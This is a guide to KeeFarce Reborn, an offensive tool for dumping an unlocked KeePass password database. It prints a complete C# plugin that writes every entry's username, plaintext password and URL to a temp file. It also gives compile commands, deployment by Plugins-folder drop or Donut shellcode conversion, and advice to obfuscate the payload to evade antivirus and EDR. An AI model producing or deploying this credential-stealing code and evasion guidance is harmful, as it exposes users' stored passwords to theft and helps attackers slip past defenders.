1. Introduction

KeeFarce Reborn is an offensive tool for extracting the contents of a KeePass database once it has been unlocked (and is therefore decrypted in memory) on the target machine.
It is based on the work of several well-known projects:

  • KeeFarce (extraction via DLL and ClrMD injection)
  • KeeThief (master key recovery)
  • KeePassHax (decryption via reflection)

The aim of KeeFarce Reborn is to simplify and modernize the method, while remaining compatible with as many environments as possible.

2. How it works

The tool takes the form of a DLL which can be:

  • injected into the KeePass process via an external injector
  • loaded as a KeePass plugin (if you have write access to the Plugins folder)

Once loaded, it uses only the native libraries of the .NET Framework, which makes it possible to:

  • reduce detection by antivirus/EDR software
  • deploy only one file
  • avoid a dependency on ClrMD (a .NET library that explores the memory of a .NET process to extract objects)
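As an added illustration of the plugin route (example code written for this page, not KeeFarce Reborn's own source), the following minimal KeePass 2.x plugin shows why no ClrMD-style memory scanning is needed once the DLL runs inside KeePass: the plugin API hands it the unlocked PwDatabase objects directly. It assumes it is compiled against the target's KeePass.exe as ExamplePlugin.dll (KeePass requires the namespace and the ...Ext class name to match the file name); the ExamplePlugin name and the output path are illustrative choices, not anything from the project.

```csharp
// Added example, not KeeFarce Reborn's code: a minimal KeePass 2.x plugin that
// reads the unlocked database through KeePass's own plugin API.
// Assumptions: built against the target's KeePass.exe as ExamplePlugin.dll
// (namespace ExamplePlugin, class ExamplePluginExt, as KeePass requires);
// OutPath is a hypothetical drop location chosen for this example.
using System;
using System.IO;
using System.Text;
using KeePass.Forms;
using KeePass.Plugins;
using KeePass.UI;
using KeePassLib;

namespace ExamplePlugin
{
    public sealed class ExamplePluginExt : Plugin
    {
        private IPluginHost m_host;
        private static readonly string OutPath =
            Path.Combine(Path.GetTempPath(), "keepass-dump.txt");

        public override bool Initialize(IPluginHost host)
        {
            if (host == null) return false;
            m_host = host;

            // Plugins load at startup, usually before any database is unlocked.
            // Dump whatever is already open, then hook the event that fires each
            // time the user unlocks a database later on.
            foreach (PwDocument doc in m_host.MainWindow.DocumentManager.Documents)
            {
                if (doc.Database != null && doc.Database.IsOpen)
                    Dump(doc.Database);
            }
            m_host.MainWindow.FileOpened += OnFileOpened;
            return true;
        }

        public override void Terminate()
        {
            if (m_host != null)
                m_host.MainWindow.FileOpened -= OnFileOpened;
        }

        private void OnFileOpened(object sender, FileOpenedEventArgs e)
        {
            if (e.Database != null && e.Database.IsOpen)
                Dump(e.Database);
        }

        // Walk every entry of the unlocked database. Field values are held as
        // ProtectedString objects; ReadSafe() returns the plaintext.
        private static void Dump(PwDatabase db)
        {
            StringBuilder sb = new StringBuilder();
            sb.AppendLine("# " + db.IOConnectionInfo.Path);
            foreach (PwEntry pe in db.RootGroup.GetEntries(true))
            {
                sb.AppendLine(string.Join("\t",
                    pe.Strings.ReadSafe(PwDefs.TitleField),
                    pe.Strings.ReadSafe(PwDefs.UserNameField),
                    pe.Strings.ReadSafe(PwDefs.PasswordField),
                    pe.Strings.ReadSafe(PwDefs.UrlField)));
            }
            File.AppendAllText(OutPath, sb.ToString());
        }
    }
}
```

Because KeePass loads plugins before the user has unlocked anything, reading the database only once in Initialize would usually find nothing; hooking MainForm.FileOpened is what makes the in-process approach reliable. The same direct object access is what an injected DLL obtains once it executes inside the KeePass process, which is why neither route needs ClrMD.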

3. Compiling KeeFarce Reborn

3.1 Prerequisites

  • Visual Studio 2015
  • .NET Framework 4.6 (installed by default on Windows 10)
  • The source code:

    git clone https://github.com/d3lb3/KeeFarceReborn.git

3.2 Method 1 - Using Visual Studio

  1. Open the KeeFarceReborn.sln file in Visual Studio.
  2. Select Configuration: Release and Platform: x64 (the DLL must match the bitness of the KeePass process it will be loaded into).
  3. Compile via Build → Build Solution (Ctrl+Shift+B).
  4. The compiled DLLs will be available in:
    • KeeFarceReborn\bin\Release\KeeFarceReborn.dll
    • KeeFarceRebornPlugin\bin\Release\KeeFarceRebornPlugin.dll

Note: to compile the plugin, place the KeePass.exe of the version installed on the target in the KeeFarceRebornPlugin folder; the plugin project is built against it, so a version mismatch causes compatibility problems when KeePass loads the plugin.

3.3 Method 2 - With MSBuild (command line)

  1. Open the Developer Command Prompt for Visual Studio.
  2. Go to the project folder.
  3. Run:

    msbuild KeeFarceReborn.sln /p:Configuration=Release /p:Platform=x64

  4. Retrieve the DLLs from the bin\Release folders.

4. After compilation

  • Injection via plugin: place the KeeFarceRebornPlugin.dll DLL in the KeePass Plugins folder (e.g. C:\Program Files\KeePass Password Safe 2\Plugins). Writing under Program Files normally requires administrator rights, and this folder is an obvious place for defenders to monitor; KeePass's application policy can also be configured to disallow plugins.

  • Injection via shellcode: convert the DLL into shellcode using Donut, where -c and -m name the class and static method Donut will call and -e 1 turns Donut's entropy (random names and encryption of the embedded module) off:

    donut.exe KeeFarceReborn.dll -c KeeFarceReborn.Program -m Main -e 1

  • To avoid detection, obfuscate or encrypt the DLL or the shellcode before deploying it.

5. Automation

To automate the process, you can use https://github.com/Orange-Cyberdefense/KeePwn